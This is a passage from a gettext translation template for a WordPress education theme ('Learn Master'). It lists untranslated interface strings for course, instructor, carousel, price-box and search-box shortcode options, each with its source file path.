msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:35 msgid "Instagram ID" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:42 msgid "Number images" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:52 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:22 msgid "3" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:53 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:23 msgid "4" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:63 msgid "Number items" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:84 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:173 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:307 msgid "Show Dots ?" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:88 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:177 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:311 msgid "If choose Yes, block will be show dots." msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:97 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:182 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:25 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:317 msgid "Show Arrow ?" msgstr "" #: framework-customizations/extensions/instagram/shortcodes/instagram/vc_options.php:101 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:186 #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:32 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:321 msgid "If choose Yes, block will be show arrow." msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:58 msgid "Icon library" msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:69 msgid "Select icon library." msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:96 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:236 msgid "Select icon from library." msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:127 msgid "Enter number of items to show.." msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:136 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:277 msgid "Slide To Scroll" msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:139 msgid "Enter number of items to scroll.." msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:148 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:288 msgid "Show Dots" msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:151 msgid "Show dots in carousel" msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:161 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:301 msgid "Show Arrows" msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:164 msgid "Show arrows in carousel" msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:174 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:315 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:377 msgid "Loop Infinite" msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:177 msgid "Is carousel loop infinite?" msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:187 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:329 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:338 msgid "Auto Play" msgstr "" #: framework-customizations/extensions/lema/includes/SLZ_Lema_Shortcode.php:190 msgid "Is carousel play?" msgstr "" #: framework-customizations/extensions/lema/includes/class-slz-lema-course.php:19 #: framework-customizations/theme/options/posts/post.php:162 msgid "Gallery Images" msgstr "" #: framework-customizations/extensions/lema/includes/class-slz-lema-course.php:779 msgid "Zoom in" msgstr "" #: framework-customizations/extensions/lema/manifest.php:6 msgid "Lema" msgstr "" #: framework-customizations/extensions/lema/manifest.php:7 msgid "This extension use add to portfolio." msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/class-slz-shortcode-course-collection.php:108 #: framework-customizations/extensions/lema/shortcodes/course-collection/class-slz-shortcode-course-collection.php:186 msgid "CLICK TO SEE" msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/class-slz-shortcode-course-collection.php:108 #: framework-customizations/extensions/lema/shortcodes/course-collection/class-slz-shortcode-course-collection.php:186 msgid "COURSE" msgid_plural "COURSES" msgstr[0] "" msgstr[1] "" #: framework-customizations/extensions/lema/shortcodes/course-collection/config.php:10 msgid "SLZ Course Collection" msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/config.php:11 msgid "List of course." msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-1.php:21 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:84 msgid "Select item columns on row." msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:36 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:128 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:86 msgid "Choose color for title." msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:37 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:45 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:53 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:61 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:34 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:47 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:61 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-1.php:75 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:33 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:46 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:59 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:72 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:295 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:308 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:317 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:326 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:335 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:348 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/vc_options.php:357 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:129 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:141 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:149 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:157 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:169 msgid "Custom Color" msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:44 msgid "Choose hover color for title." msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:49 msgid "Link Color" msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:52 msgid "Choose color for link." msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:57 msgid "Link Hover Color" msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:60 msgid "Choose hover color for link." msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:43 msgid "Choose Course Category." msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:47 msgid "Limit Items" msgstr "" #: framework-customizations/extensions/lema/shortcodes/course-collection/vc_options.php:50 msgid "Number of items limit on page." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/config.php:10 msgid "SLZ Featured Course" msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/config.php:11 msgid "Display a featured course." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:5 #: framework-customizations/extensions/portfolio/hooks.php:18 msgid "- Choose Course -" msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:35 msgid "Featured Post" msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:36 msgid "Choose post to featured post." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:43 msgid "Enter button. If blank title button will not display." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:51 msgid "Display Description" msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:57 msgid "Select show/hide description." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:61 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:164 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:149 msgid "Description Length" msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:64 msgid "Length of course description display. Default: 25." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:88 msgid "Label Text" msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:91 msgid "Add label for this block. If blank, it will not display." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:103 msgid "Text of button. If blank, it will not display." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:126 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:112 msgid "Choose a custom title text hover color." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:131 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:98 msgid "Label Color" msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:133 msgid "Choose a custom label color." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:145 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:28 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:125 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:269 msgid "Button Color" msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:147 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:128 msgid "Choose a custom button color." msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:152 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:36 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:26 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:133 msgid "Button Hover Color" msgstr "" #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:154 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:136 msgid "Choose a custom button hover color." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/config.php:10 msgid "SLZ Instructor" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/config.php:11 msgid "List of instructor." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:10 msgid "- All Instructors -" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:34 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:55 msgid "List Instructors" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:39 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:60 msgid "Instructor Name" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:44 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:65 msgid "Choose instructor to display." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:84 msgid "Show Avatar" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:91 msgid "Choose to display avatar." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:95 msgid "Show Icon Avatar" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:102 msgid "Choose to display icon avatar." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:106 msgid "Show Statistic" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:113 msgid "Choose to display instructor's statistic." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:117 msgid "Show Role" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:124 msgid "Choose to display role." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:128 msgid "Show Social Icon" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:135 #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:146 msgid "Choose to display social icon." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:139 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:128 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:155 msgid "Show Description" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:150 msgid "Show Course Popular" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:157 msgid "Choose to display course popular." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:165 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:329 msgid "Enter number of items to show." msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:190 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:68 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:279 msgid "Is Dots Navigation ?" msgstr "" #: framework-customizations/extensions/lema/shortcodes/instructor/vc_options.php:206 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:76 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:81 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:288 msgid "Is Arrows Navigation ?" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:13 msgid "Category List" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:14 msgid "Display course category list." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:15 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-category.php:8 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-best-selling.php:8 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:19 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:14 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course.php:33 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:9 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:17 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:7 #: framework-customizations/theme/manifest.php:211 msgid "Learn Master" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:60 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:70 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:84 #: framework-customizations/extensions/shortcodes/shortcodes/contact/vc_options.php:14 msgid "Choose layout for this shortcode." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:78 msgid "Display Type" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:91 msgid "Enter number of category to show." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:105 msgid "Choose columns on row. Default: Three." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:113 msgid "Description Limit" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:116 msgid "Enter number of description's words limit." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:124 msgid "Choose to show title." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:132 msgid "Choose to show description." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:136 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:87 msgid "Show Icon" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:140 msgid "Choose to show icon." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:148 #: framework-customizations/extensions/shortcodes/shortcodes/main-title/vc_options.php:88 msgid "Show Image" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:152 msgid "Choose to show image." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:163 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-category.php:38 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:37 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:31 msgid "Add extra class to block shortcode" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:167 msgid "List Category" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:172 msgid "Category Name" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:176 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:146 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:119 msgid "Choose category to filter." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:179 msgid "Add category to filter." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:184 #: framework-customizations/theme/options/post-settings.php:193 #: framework-customizations/theme/options/post-settings.php:528 msgid "Filter By" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:188 msgid "Feature" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:189 msgid "Top Enroll" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:192 msgid "Choose to filter by." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:268 msgid "Enter number of items to show. Default is 1." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:279 msgid "Enter number of items to scroll. Default is 1." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:292 msgid "Show dots in carousel. Default is Yes." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:305 msgid "Show arrows in carousel. Default is Yes." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:319 msgid "Is carousel loop infinite? Default is Yes." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:333 msgid "Is carousel play? Default is Yes." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-category.php:9 msgid "Display course category." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-category.php:25 msgid "Tab" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-category.php:28 msgid "Select type of category." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-best-selling.php:7 msgid "Course List Best Selling" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-best-selling.php:9 msgid "Display course list best selling." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:18 msgid "Course List Filtered" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:20 msgid "Display course list with filter conditional." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:59 msgid "List" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:61 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:54 #: framework-customizations/extensions/shortcodes/shortcodes/partner/vc_options.php:40 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/vc_options.php:167 msgid "Slide" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:64 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:57 msgid "Select type of course list. Default: Grid." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:71 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:64 msgid "Enter title." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:85 msgid "Choose columns on row. Default: Four." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:100 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:92 msgid "Choose to display pagination." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:111 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:103 msgid "Enter post per page. Default: -1 (Unlimited)." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:119 msgid "Select field to sort courses." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:123 msgid "Sort Order" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:126 msgid "Ascending" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:127 msgid "Descending" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:130 msgid "Select type of sort. Default: Descending." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:134 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:107 msgid "Search Term" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:137 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:110 msgid "Enter keyword to search. Default: 1." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:142 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:115 msgid "Filter By Category" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:155 #: framework-customizations/theme/options/post-settings.php:152 #: framework-customizations/theme/options/post-settings.php:238 msgid "Date" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:156 msgid "Course Price" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:157 msgid "Rate" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list-filtered.php:158 msgid "Review" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:13 msgid "Course List" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:15 msgid "Display course list." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course-list.php:77 msgid "Choose columns on row. Default: One." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course.php:32 #: framework-customizations/extensions/portfolio/hooks.php:47 msgid "Course" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course.php:46 msgid "Course Name" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course.php:49 msgid "Enter course name" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course.php:138 #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:23 msgid "Choose Style" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-course.php:161 msgid "Choose Template" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:7 msgid "Price Box" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:8 msgid "Buy Service Cource." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:21 msgid "Enter title for shortcode." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:27 msgid "Enter description old for shortcode." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:31 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:135 #: framework-customizations/theme/options/course-settings.php:56 #: framework-customizations/theme/options/course-settings.php:71 msgid "Price" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:33 msgid "Enter price for shortcode." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:37 msgid "Price Old" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:39 msgid "Enter price old for shortcode." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:43 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:164 msgid "Unit" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:45 msgid "Enter unit for shortcode." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:49 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:174 msgid "Price Subfix" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:51 msgid "Enter subfix for shortcode." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:55 msgid "Show Label" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:57 msgid "Show label for this shortcode" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:64 msgid "Enter button text for shortcode." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:16 msgid "Courses Search Box" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:18 msgid "Display course card search box." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:31 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:104 msgid "Set the background color of button." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:39 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:29 msgid "Set the background color of button when hover." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:47 msgid "Set the background color of button icon." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:52 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:216 msgid "Icon Hover Color" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:55 msgid "Set the background color of button icon when hover." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:72 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:44 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:12 msgid "NewYork" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:74 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:48 msgid "Select style of search box." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:78 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:52 msgid "Placeholder Text" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:81 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:88 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:98 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:55 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:62 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:81 msgid "Add extra class to search box." msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:6 msgid "Course Search University" msgstr "" #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:8 msgid "Searchbox for 